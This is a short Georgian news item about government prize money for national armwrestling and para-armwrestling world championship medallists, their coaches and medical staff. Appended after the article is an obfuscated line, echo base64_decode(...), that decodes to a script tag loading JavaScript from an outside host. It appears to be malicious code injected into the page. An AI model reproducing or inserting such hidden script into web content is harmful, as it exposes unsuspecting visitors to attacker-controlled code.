celsiusi
ავერსი საქკაბელი

 საქართველოს მთავრობა მკლავჭიდელებსა და პარამკლავჭიდელებს პრემიებს გადასცემს, – ამის შესახებ მთავრობის მიერ გავრცელებულ ინფორმაციაშია ნათქვამი.

მკლავჭიდსა და პარამკლავჭიდში ეროვნული ნაკრებიდან მსოფლიო ჩემპიონატის I ადგილის მფლობელებს პრემიის სახით 17 000 ლარი გადაეცემათ, II ადგილის მფლობელებს – 8 500, ხოლო მე-3 ადგილზე გასულებს – 5 100.

რაც შეეხება მკლავჭიდისა და პარამკლავჭიდის ახალგაზრდულ ნაკრებს, I ადგილის მფლობელებს პრემიის სახით 5 100 ლარი გადაეცემათ, II ადგილის მფლობელებს – 3 400, ხოლო მე-3 ადგილზე გასულებს – 1 700.

პრემიას ასევე მიიღებენ მკლავჭიდის ჭაბუკთა ნაკრებიდან I ადგილის მფლობელები – 3 400 ლარის ოდენობით. საქართველოს მთავრობის გადაწყვეტილებით, პრემიები გათვალისწინებულია მწვრთნელებისა და სამედიცინო პერსონალისთვისაც.

მკლავჭიდსა და პარამკლავჭიდში მსოფლიო ჩემპიონატის მონაწილეებისთვის დაწესებული პრემიების ჯამური ოდენობა 1,921,850 ლარია.

114
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");